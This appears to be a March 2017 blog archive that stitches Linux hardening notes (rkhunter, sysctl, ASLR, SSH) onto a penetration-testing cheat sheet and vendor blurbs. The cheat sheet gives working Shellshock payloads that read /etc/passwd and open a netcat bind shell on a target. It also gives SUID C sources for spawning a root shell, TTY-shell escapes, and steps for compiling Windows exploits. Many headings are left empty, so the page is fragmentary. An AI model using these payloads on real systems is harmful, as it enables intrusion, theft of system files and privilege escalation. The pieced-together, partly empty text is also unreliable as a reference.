Month: March 2017

The unhide command for RKHUNTER in CentOS 7 must be installed with the following “Yum” command:

yum install unhide unhide-tcp

I have detected that rkhunter need this file to be able to unhide stuff!

Info: Starting test name ‘malware’
Performing malware checks
Info: Test ‘deleted_files’ disabled at users request.
Info: Starting test name ‘running_procs’
Checking running processes for suspicious files [ None found ]
Info: Starting test name ‘hidden_procs’
Info: Unable to find the ‘unhide’ command
Info: Unable to find the ‘unhide-linux’ command
Checking for hidden processes
[ Skipped ]

rkhunter command line

Have Phun!

YUM Commands

Package manager used by RPM based systems, you can pull some usefull information about installed packages and or install additional tools.

System Information Commands

Useful for local enumeration.

#nano /etc/sysctl.conf

net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
net.ipv4.tcp_max_syn_backlog = 1280
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.secure_redirects = 0
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.tcp_timestamps = 0

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

Searching for Exploits

Install local copy of exploit-db:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker

./shocker.py -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

cat file (view file contents)

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock run bind shell

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock reverse Shell

nc -l -p 443

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

HTTP / HTTPS Webserver Enumeration

Packet Inspection

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

SNMP User Enumeration

Passwords

Wordlists

Brute Forcing Services

Hydra FTP Brute Force

Hydra POP3 Brute Force

Hydra SMTP Brute Force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

Build Exploit GCC

Compile exploit gcc.

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}       

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}       

Building the SUID Shell binary

gcc -o suid suid.c  

For 32 bit:

gcc -m32 -o suid suid.c  

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Some basic Metasploit stuff, that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

Windows VNC Meterpreter payload

Linux Reverse Meterpreter payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

Local Windows Metasploit Modules (exploits)

Auxilary Metasploit Modules

Metasploit Powershell Modules

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

CISCO IOS Commands

A collection of useful Cisco IOS commands.

Cryptography

Hash Lengths

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

SQLMap Examples

Disable core dumps for all users

#nano /etc/security/limits.conf

* hard core 0

Disable core dumps for SUID programs

#sysctl -w fs.suid_dumpable=0
#fs.suid_dumpable = 0

Set runtime for fs.suid_dumpable
#sysctl -q -n -w fs.suid_dumpable=0

If fs.suid_dumpable present in /etc/sysctl.conf, change value to “0” else, add “fs.suid_dumpable = 0” to /etc/sysctl.conf

if grep –silent ^fs.suid_dumpable /etc/sysctl.conf ; then sed -i ‘s/^fs.suid_dumpable.*/fs.suid_dumpable = 0/g’ /etc/sysctl.conf else echo “” >> /etc/sysctl.conf echo “# Set fs.suid_dumpable to 0 per security requirements” >> /etc/sysctl.conf echo “fs.suid_dumpable = 0” >> /etc/sysctl.conf
fi

Buffer Overflow Protection

This section helps mitigate against Buffer Overflow attacks (BOF).

Enable ExecShield

Helps prevent stack smashing / BOF.

Enable on current kernel: sysctl -w kernel.exec-shield=1

Add to /etc/sysctl.conf:

kernel.exec-shield = 1

Check / Enable ASLR

Set runtime for kernel.randomize_va_space sysctl -q -n -w kernel.randomize_va_space=2

Add kernel.randomize_va_space = 2 to /etc/sysctl.conf if it does not already exist.

Enable XD or NX Support on x86 Systems

Recent processors in the x86 family support the ability to prevent code execution on a per memory page basis. Generically and on AMD processors, this ability is called No Execute (NX), while on Intel processors it is called Execute Disable (XD). This ability can help prevent exploitation of buffer overflow vulnerabilities and should be activated whenever possible. Extra steps must be taken to ensure that this protection is enabled, particularly on 32-bit x86 systems. Other processors, such as Itanium and POWER, have included such support since inception and the standard kernel for those platforms supports the feature.

Check bios and ensure XD/NX is enabled, not relevant for VM’s.

Disable SSH Support for .rhosts Files

SSH can emulate the behavior of the obsolete rsh command in allowing users to enable insecure access to their accounts via .rhosts files.

To ensure this behavior is disabled, add or correct the following line in /etc/ssh/sshd_config:

IgnoreRhosts yes

We’re making it possible for everyone to experience a secure and privacy-respecting Web. We make it easy to get certificates for HTTPS, because ease of use is critical for adoption. We provide certificates free of charge, because cost excludes people. Our certificates are available in every country in the world, because the secure Web is for everyone. We strive to be open and transparent, because these values are essential for trust.

https://letsencrypt.org/donate/

Untangle’s Firewall filters traffic based on IP address, protocol and ports and allows administrators to designate which systems and services (http, ftp, etc.) are publicly available, create a DMZ and perform NAT (with Router), and run as a transparent bridge to complement existing hardware.

Untangle is much more than a firewall. It is, in fact, a Linux distribution that includes a host of software written by other developers. Software includes a Web Filter, Spam Blocker, Spyware Blocker, Virus Blocker, Phish Blocker, Instrusion Prevention, Attack Blocker, OpenVPN, Router, Untangle Reports, and Untangle Platform.

Features include:

• Blocks sessions based on simple rules
• Rules can be based on a variety of attributes
• Custom logging, blocking or passing rules can be created by:
  • protocol
  • direction
  • source address
  • destination address
  • source port
  • destination port

Source : https://www.untangle.com/